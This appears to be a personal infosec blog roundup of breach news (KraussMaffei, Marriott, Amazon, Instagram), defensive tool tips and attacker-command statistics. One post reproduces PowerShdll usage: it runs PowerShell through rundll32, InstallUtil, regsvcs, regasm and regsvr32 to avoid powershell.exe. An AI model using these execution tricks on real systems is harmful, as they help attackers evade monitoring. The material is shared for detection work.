Cyber attack: KraussMaffei blackmailed by hackers
Heise News is reporting that Kraus Maffei has been blackmailed by attackers using EMOTET. From my personal background I know, that some employees are still sitting at home waiting for theit IT euipment to be rebuild so they can start working again.
Sometimes the cost of a good cyber defence has to be meisured by the cost of not having them had in the forehand.
Translation of the original articel from heise by Oliver Bünte:
The engineering group Krauss Maffei has been struck by a serious cyber attack. After the attack a good two weeks ago, the company headquartered in Munich produced at some locations only with reduced performance, as many computers were paralyzed due to a Trojan attack, confirmed a company spokesman on Thursday evening. In the meantime, his company is on the "way to the normal state", production is being ramped up. Important files would be made to work. The vast majority of sites were not affected.
In addition, the previously unknown attackers should have demanded ransom from the group. The speaker did not want to say anything about the amount of the claim. Several security authorities were informed immediately after the attack on the night of November 21, according to the Frankfurter Allgemeine Zeitung (FAZ).
Trojan causal
According to the FAZ, the main location affected by the
attack was the Munich location, where around 1,800 employees work for
KraussMaffei and produce machinery for industry. An unspecified Trojan would
have infested the network, encrypted computer files and thus rendered useless.
Whether this is a variant of the Trojan Emotet, is still unclear. As a result of
the attack control systems in production and assembly could not have been
started. The systems were running again, however. The company did not provide
information on the amount of damage.
On request of the FAZ, the Federal Office for Information Security (BSI) referred to two other topical cases without mentioning the names of those affected. One of the two companies is likely to be the clinic in Fürstenfeldbruck, Bavaria, for which a variant of the currently rampant Trojan Emotet is believed to be the cause. According to a BSI spokesman, one hundred percent of the network's servers and computers failed during the attacks. In addition, several companies had shut down their production facilities themselves, resulting in production losses. It is unclear whether they are the same perpetrators in all cases.
The KraussMaffei Group with more than 5,000 employees claims to be one of the world's leading manufacturers of machinery and equipment for the production and processing of plastics and rubber. In 2016, the group was acquired by the Chinese chemicals group China National Chemical Corporation (ChemChina). The Chinese Securities and Exchange Commission has recently granted approval for a planned IPO, according to the company. The engineering company is not to be confused with the armaments company and tank builder Krauss-Maffei Wegmann (KMW). (with dpa material)
1st responder action for IR
Started some writing about what to do as 1st responder in a incident response case.
Stay tuned and join me on my article.
Free: IOC and YARA scanner Spark
Nextron is sharing (a milited version) a multi-platform IOC and YARA scanner.
- Free scanner for Windows, Linux and macOS
- Precompiled and encrypted open source signature set
- Update utility to download tested versions with signature updates
- Documentation
- Custom IOCs and signatures
- Different output formats: text log, SYSLOG (udp/tcp/tcp+tls), JSON to file, JSON via Syslog
- Scan throttling to limit the CPU usage
sysmon: Hunting for evil: detect macros being executed
Door Pieter Ceelen, Technical security analyst at
Outflank is sharing his thoughts and techniques of using sysmon to
detect the execution of macros for your SIEM.
Enhance your sysmon config with:
And get:
Someone Hacked 50,000 Printers to Promote PewDiePie YouTube Channel
One of these "you'd have never thought of this":
To promote a YoutUbe channel, a guy used a common printer exploit kit to print his promotion.
Data breach: Marriot Hotel reservation system
327 Million customer records have been (partly or complete) leaked from Amrriott hotel since 2014. "Houston, we have a problem" :-)
Marriott values our guests and understands the importance of protecting personal information. We have taken measures to investigate and address a data security incident involving the Starwood guest reservation database. The investigation has determined that there was unauthorized access to the database, which contained guest information relating to reservations at Starwood properties on or before September 10, 2018. This notice explains what happened, measures we have taken, and some steps you can take in response.
On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database. Marriott quickly engaged leading security experts to help determine what occurred. Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database.
Marriott has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property. For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information. Marriott reported this incident to law enforcement and continues to support their investigation. We have already begun notifying regulatory authorities.
Marriott deeply regrets this incident happened. From the start, we moved quickly to contain the incident and conduct a thorough investigation with the assistance of leading security experts. Marriott is working hard to ensure our guests have answers to questions about their personal information with a dedicated website and call center. We are supporting the efforts of law enforcement and working with leading security experts to improve. Marriott is also devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network.
Excellent: Windows Post Exploitation Article found
mubix@hak5.org did an excellent summary with a cool collection of short commands that keeps you from searching.
I found a lot of cool stuf that can beused in other areas of the cyber work as well.
Check the source at: Google or see my page done witzh it's data.
Good source to create a Usecase: Windows Commands Abused by Attackers
Shusei Tomonaga is giving good results on most commonly used windows internal commands. From looking at the specific hitrates, this would be a perfect entrypoint for creating some usecases to detect bad guys on the machine.
Read the complete article here.
| Ranking | Command | Times executed |
|---|---|---|
| 1 | tasklist | 155 |
| 2 | ver | 95 |
| 3 | ipconfig | 76 |
| 4 | systeminfo | 40 |
| 5 | net time | 31 |
| 6 | netstat | 27 |
| 7 | whoami | 22 |
| 8 | net start | 16 |
| 9 | qprocess | 15 |
| 10 | query | 14 |
Reconnaissance
| Ranking | Command | Times executed |
|---|---|---|
| 1 | dir | 976 |
| 2 | net view | 236 |
| 3 | ping | 200 |
| 4 | net use | 194 |
| 5 | type | 120 |
| 6 | net user | 95 |
| 7 | net localgroup | 39 |
| 8 | net group | 20 |
| 9 | net config | 16 |
| 10 | net share | 11 |
Spread of Infection
| Ranking | Command | Times executed |
|---|---|---|
| 1 | at | 103 |
| 2 | reg | 31 |
| 3 | wmic | 24 |
| 4 | wusa | 7 |
| 5 | netsh advfirewall | 4 |
| 6 | sc | 4 |
| 7 | rundll32 | 2 |
p3nt4: Run PowerShell with dlls only
We all know, that using Powershell is an often seen way of action for the bads guys, but since sysmon, it's even easy to detect.
Now, the situation might slightly change, as powershell.exe is not needed any more. :-/
But have your own mind setup while reading this article by p3nt4. .
Rundll32:
Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h Display this message
rundll32 PowerShdll,main -f <path> Run the script passed as argument
rundll32 PowerShdll,main -w Start an interactive console in a new window (Default)
rundll32 PowerShdll,main -i Start an interactive console in this console
If you do not have an interractive console, use -n to avoid crashes on output
Alternatives (Credit to SubTee for these techniques):
1.
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShdll.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShdll.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShdll.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShdll.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShdll.dll
4.
regsvr32 /s /u PowerShdll.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShdll.dll --> Calls DllRegisterServerAmazon admits it exposed customer email addresses, but refuses to give details
by
TechCrunch: Zack Whittaker, Josh Constine
Amazon emailed users Tuesday, warning them that it exposed an unknown number of customer email addresses after a “technical error” on its website.
When reached for comment, an Amazon spokesperson told TechCrunch that the issue exposed names as well as email addresses. “We have fixed the issue and informed customers who may have been impacted.” The company emailed all impacted users to be cautious.
In response to a request for specifics, a spokesperson said the company had “nothing to add beyond our statement.” The company denies there was a data breach of its website of any of its systems, and says it’s fixed the issue, but dismissed our request for more info including the cause, scale and circumstances of the error.
Amazon’s reticence here puts those impacted at greater risk. Users don’t know which of Amazon’s sites was impacted, who their email address could have been exposed to, or any ballpark figure of the number of victims. It’s also unclear whether it has or plans to contact any government regulatory bodies.
“We’re contacting you to let you know that our website inadvertently disclosed your email address due to a technical error,” said Amazon in the email with the subject line: “Important Information about your Amazon.com Account.” The only details Amazon provided were that: “The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.”
Continue the full story here.
Awesome Windows Domain Hardening
A curated list of awesome Security Hardening techniques for Windows.
Thanks to PaulSec. He provided the
community with a cool selection of tools and howto's to harden your windows
domain.
Created by gepeto42 and PaulWebSec but highly inspired from PyroTek3 research!
This document summarizes the information related to Pyrotek and Harmj0y's DerbyCon talk called "111 Attacking EvilCorp Anatomy of a Corporate Hack". Video and slides are available below.
It also incorporates hardening techniques necessary to prevent other attacks, including techniques discussed by gepeto42and joeynoname during their THOTCON 0x7 talk.
On personal behalf: Me in the news...
One of my latest articles released at VDI:
Continue here
Mail Header Analyzer: Parse the mailheader
Ever been tiered of cut n' paste email headers for forensic reports into
Excel an Word?
Well, just use the MHA tool of Ahmed Shawky to easy that job.
Paste the raw header, compute and you can cut and past a cool table and pic directly into word.
FCL - Fileless Command Lines
Known command-lines of fileless malicious executions.
https://github.com/chenerlich/FCL/tree/master/Malwares
Motivation
While hashing malicious files to identify malicious executions is easy, blocking the execution of fileless malware is more challenging. This repository's purpose is to collect command lines being used by threat actors, to ease the difficult of identifying them.
Structure
Each FCL file contains\may contain the following data:
- Malware name
- Executing process(es)
- Malicious command-lines (contain dysfunctional URLs)
- Fully\Partially deobfuscated command-lines
- Regular Expression for detection
- Technical write-ups
- Sandbox report links
- Notes
Instagram accidentally exposed some user passwords through its data download tool
By accentenly providing some users with their cleartext passwords, Instagram proved to store the passwords reversible at their storage. This will be a hurray for future data leaks I guess.
NIST: Guide to Malware Incident Prevention and Handling for Desktops and Laptops
A less technical but rather process view of handling a malware incidence
response.
This will become a "must read" for every incident
responder.
WIRED: THE HAIL MARY PLAN TO RESTART A HACKED US ELECTRIC GRID
Wired has published another excellent article of a real-scenario-test of some DARPA-tools after a hacker attacked of power grids recently.
IN HIS YEARS-LONG career developing software for power grids, Stan McHann had never before heard the ominous noise that rang out last Wednesday. Standing in the middle of a utility command center, he flinched as a cyberattacktripped the breakers in all seven of the grid's low voltage substations, plunging the system into darkness. "I heard all the substations trip off and it was just like bam bam bam bam bam bam bam bam," McHann says. "The power’s out. All you can do is say, OK, we have to start from scratch bringing the power back up. You just take a deep breath and dig in."
Thankfully, what McHann experienced wasn't the first-ever blackout caused by a cyberattack in the United States. Instead, it was part of a live, week-long federal research exercise in which more than 100 grid and cybersecurity experts worked to restore power to an isolated, custom-built test grid.
In doing so they faced not just blackout conditions and rough weather, but also a group of fellow researchers throwing a steady barrage of cyberattacks their way, hoping to stymie their progress just as a real enemy might.
Enjoy the whole article here.
US Cyber Command starts uploading foreign APT malware to VirusTotal
Follow the USCYBERCOM Malware Alert on Twitter to be informed of published uncassified APT malware samples at VirusTotal.
This account is an alerting mechanism to highlight when #CNMF posts malware
samples to Virus Total, enhancing our shared global cybersecurity.
FORT GEORGE G. MEADE, Md. — Today, the Cyber National Mission Force, a unit subordinate to U.S. Cyber Command, posted its first malware sample to the website VirusTotal. Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity. For members of the security community, CNMF-discovered malware samples will be logged at this website:
Exploit Developer Discovers Zero-Day Microsoft Edge Vulnerability Triggering RCE Attacks
Zero-Day Microsoft Edge Vulnerability Induces RCE Attacks
As disclosed, an exploit developer Yushi Liang has claimed to have found a vulnerability that breaks Microsoft Edge browsers. The newly discovered zero-day Microsoft Edge vulnerability could allow an attacker to remotely execute arbitrary codes on the target system. Liang first revealed his discovery in a tweet.
No Patches Available Yet
For now, users of Microsoft Edge may not find a fix for the bug since the researcher has not reported the flaw to Microsoft. Probably, as more details come up, Microsoft may release a patch for it. However, until then, the only mitigation seems to be the choice of user accounts. While using Microsoft Edge, users may avoid logging in to accounts with administrator privileges for minimal damages.
